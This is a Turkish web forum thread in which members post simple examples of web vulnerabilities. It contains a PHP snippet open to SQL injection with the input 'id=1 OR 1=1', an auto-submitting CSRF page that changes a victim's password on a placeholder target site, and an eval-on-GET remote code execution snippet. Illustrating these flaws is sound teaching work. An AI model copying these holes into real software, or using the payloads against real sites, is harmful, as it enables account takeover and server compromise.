• 04-04-2025, 19:26:42
    #1
    Güvenlik Açığı:SQL Enj.

    Örnek Kod:
    $id = $_GET['id'];
    $query = "SELECT * FROM users WHERE id = $id";

    Kullanım Örneği: /index.php?id=1 OR 1=1

    Bu formatta herkes aklına geleni söylesin Sunucu taraflı örneklerde verebilirsiniz kolay gelsin...
  • 04-04-2025, 19:35:49
    #2
    ⚡Yazılım Uzmanı
    Backdoor
  • 04-04-2025, 19:35:58
    #3
    CSRF token cidden çok ciddi açıktır çoğu modern uygulama ve framework koruma sağlar bunla ilgili

    Edit:
    <html>
    <body onload="document.forms[0].submit()">
    <form action="https://hedefsite.com/change-password" method="POST">
    <input type="hidden" name="new_password" value="hacked123">
    </form>
    </body>
    </html>

    Bu sayfa, kullanıcı hedef siteye giriş yapmışsa (çerezleri tarayıcıda hala geçerliyse), kullanıcının şifresini saldırganın belirlediği şekilde değiştirebilir
  • 04-04-2025, 19:36:30
    #4
    kzlsnn adlı üyeden alıntı: mesajı görüntüle
    Backdoor
    Biraz daha açar mısınız konunun amacına uygun olarak
  • 04-04-2025, 19:37:01
    #5
    tekfir adlı üyeden alıntı: mesajı görüntüle
    CSRF token cidden çok ciddi açıktır çoğu modern uygulama ve framework koruma sağlar bunla ilgili
    Çok güzel örneklemeli bir şekilde yazabilir misiniz yada konuyu editleyebilirsiniz teşekkürler.
  • 04-04-2025, 19:46:22
    #6
    Yazdığınız şey MySQL ile alakalı; PHP ile değil.

    Dillerde açık byte level olur.
  • 04-04-2025, 19:47:59
    #7
    flyingatm adlı üyeden alıntı: mesajı görüntüle
    Yazdığınız şey MySQL ile alakalı; PHP ile değil.

    Dillerde açık byte level olur.
    Lütfen konsepte uyalım, konuyu editleyip bir tane açık yazar mısınız iyi forumlar sevgiler...
  • 04-04-2025, 19:48:47
    #8
    Merhaba hocam,
    En tehlikelisi ve yapılması zor olan RCE'dir.

    <?php
    eval($_GET['code']);
    ?>
  • 04-04-2025, 19:49:55
    #9
    MeXe adlı üyeden alıntı: mesajı görüntüle
    Merhaba hocam,
    En tehlikelisi ve yapılması zor olan RCE'dir.

    <?php
    eval($_GET['code']);
    ?>
    Tam da bunu bekliyordum PHP'için en tehlkeli kod budur gerçekten hiç kuşkusuz bütün sunucuyu darmadağan eder R10+ hak ettiniz